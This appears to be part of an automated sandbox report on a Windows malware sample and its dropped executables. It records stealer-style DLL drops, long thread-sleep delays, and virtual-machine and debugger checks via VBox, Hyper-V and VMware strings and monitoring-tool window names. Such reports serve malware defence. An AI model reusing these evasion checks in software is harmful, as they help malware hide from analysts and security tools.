Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Window / User API: threadDelayed 1181

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\W5BO33UUYQPDZ9CE875CW1XCH.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\soft[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Y-Cleaner.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\YVDVBfFGR3eAeBewwD9vewWwVe0B\Bunifu_UI_v1.5.3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1019812001\54682ac64c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CaHNbeclRGcBxNSvHjFX.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\main\7z.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\service123.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\dll[1]	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\RHNKLLDCS2RT92VKR9MYB3VQ90O2X.exe	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 744	Thread sleep count: 58 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 744	Thread sleep time: -116058s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4592	Thread sleep count: 1349 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 4592	Thread sleep time: -2699349s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3624	Thread sleep count: 1251 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 3624	Thread sleep time: -2503251s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6108	Thread sleep count: 1253 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6108	Thread sleep time: -2507253s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep count: 1238 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 2144	Thread sleep time: -2477238s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5080	Thread sleep count: 261 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5080	Thread sleep time: -7830000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe TID: 8428	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe TID: 5228	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe TID: 1704	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe TID: 3748	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5984	Thread sleep count: 9736 > 30
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5984	Thread sleep time: -292080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe TID: 5628	Thread sleep time: -180000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172	Thread sleep count: 164 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172	Thread sleep time: -164000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172	Thread sleep count: 40 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 8172	Thread sleep time: -40000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7208	Thread sleep count: 1223 > 30
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7208	Thread sleep time: -2447223s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6016	Thread sleep count: 1231 > 30
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6016	Thread sleep time: -2463231s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 6696	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 5576	Thread sleep count: 1167 > 30
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 5576	Thread sleep time: -2335167s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 8104	Thread sleep count: 1426 > 30
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 8104	Thread sleep time: -2853426s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7252	Thread sleep count: 1197 > 30
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe TID: 7252	Thread sleep time: -2395197s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304	Thread sleep count: 66 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304	Thread sleep time: -66000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304	Thread sleep count: 102 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 7304	Thread sleep time: -102000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988	Thread sleep count: 49 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988	Thread sleep time: -49000s >= -30000s
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988	Thread sleep count: 106 > 30
Source: C:\Program Files\Windows Media Player\graph\graph.exe TID: 1988	Thread sleep time: -106000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 4936	Thread sleep count: 1194 > 30
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 4936	Thread sleep time: -2389194s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2180	Thread sleep count: 1206 > 30
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2180	Thread sleep time: -2413206s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 6396	Thread sleep time: -32000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 1900	Thread sleep count: 1204 > 30
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 1900	Thread sleep time: -2409204s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2924	Thread sleep count: 1224 > 30
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2924	Thread sleep time: -2449224s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2008	Thread sleep count: 1181 > 30
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe TID: 2008	Thread sleep time: -2363181s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7104	Thread sleep count: 72 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7104	Thread sleep time: -144072s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7120	Thread sleep count: 67 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7120	Thread sleep time: -134067s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 3264	Thread sleep time: -44000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6428	Thread sleep count: 70 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6428	Thread sleep time: -140070s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7896	Thread sleep time: -300000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6252	Thread sleep count: 91 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6252	Thread sleep time: -182091s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7140	Thread sleep count: 83 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7140	Thread sleep time: -166083s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8180	Thread sleep count: 108 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8180	Thread sleep time: -216108s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8072	Thread sleep count: 102 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 8072	Thread sleep time: -204102s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7148	Thread sleep count: 100 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7148	Thread sleep time: -200100s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7016	Thread sleep count: 105 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 7016	Thread sleep time: -210105s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 5252	Thread sleep count: 87 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 5252	Thread sleep time: -174087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2696	Thread sleep time: -44000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2212	Thread sleep count: 97 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2212	Thread sleep time: -194097s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2256	Thread sleep count: 103 > 30
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe TID: 2256	Thread sleep time: -206103s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7064	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7064	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7384	Thread sleep time: -36000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1880	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 6800	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7176	Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7984	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7984	Thread sleep time: -70035s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1104	Thread sleep count: 34 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 1104	Thread sleep time: -68034s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7236	Thread sleep count: 33 > 30
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe TID: 7236	Thread sleep time: -66033s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1019800001\af155ed129.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_003436A9 FindFirstFileExW,	8_2_003436A9
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 8_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	8_2_0034375A
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_003436A9 FindFirstFileExW,	10_2_003436A9
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	Code function: 10_2_0034375A FindFirstFileExW,FindNextFileW,FindClose,FindClose,	10_2_0034375A

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\e458d263c0\Gxtuum.exe	Thread delayed: delay time: 180000

Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\Documents\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData\Local\Temp
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe	File opened: C:\Users\user\AppData\Local

Source: file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B66000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWIh
Source: cd2469328d.exe, 0000000B.00000002.2792887182.0000000000CFD000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000003.2792015764.0000000000CFC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWhc
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: file.exe, 00000000.00000003.1725731744.000000000139F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: 7739517025.exe, 0000000D.00000002.2669175914.0000000001290000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: a-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7
Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`v
Source: cd2469328d.exe, 0000000B.00000003.2792191733.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, cd2469328d.exe, 0000000B.00000002.2792985078.0000000000D38000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2870509764.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2659069201.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773819917.00000000017B9000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2635795252.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, 5cda6c90d7.exe, 0000000C.00000003.2773960939.00000000017BB000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000003.2843436830.000002B0C1B66000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1AE5000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000010.00000002.2885993899.000002B0C1B61000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5cda6c90d7.exe, 0000000C.00000002.2870509764.0000000001789000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH
Source: b05c9e01f3.exe, 00000016.00000002.3059346963.0000000000E61000.00000040.00000001.01000000.00000012.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: file.exe, 00000000.00000002.1759031975.0000000000A49000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000001.00000002.1791335629.0000000000B99000.00000040.00000001.01000000.00000007.sdmp, 5cda6c90d7.exe, 0000000C.00000002.2863553827.000000000113E000.00000040.00000001.01000000.0000000B.sdmp, b05c9e01f3.exe, 00000016.00000002.3061587262.000000000113D000.00000040.00000001.01000000.00000012.sdmp, 35f0a75b93.exe, 0000002B.00000000.3400109760.0000000000741000.00000080.00000001.01000000.0000001D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: b6638733e4.exe, 00000013.00000003.2915551052.0000000006B91000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlK'$
Source: b6638733e4.exe, 00000013.00000003.2912893712.0000000001972000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: cc6f25572f.exe, 00000011.00000002.2919171490.000001D669965000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2893696860.000001D669962000.00000004.00000020.00020000.00000000.sdmp, cc6f25572f.exe, 00000011.00000003.2874665665.000001D669960000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW.4

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	API call chain: ExitProcess graph end node			graph_1-10726
Source: C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe	API call chain: ExitProcess graph end node			graph_8-14447

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe

System information queried: KernelDebuggerInformation

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019802001\5cda6c90d7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1019805001\b6638733e4.exe	Process queried: DebugPort
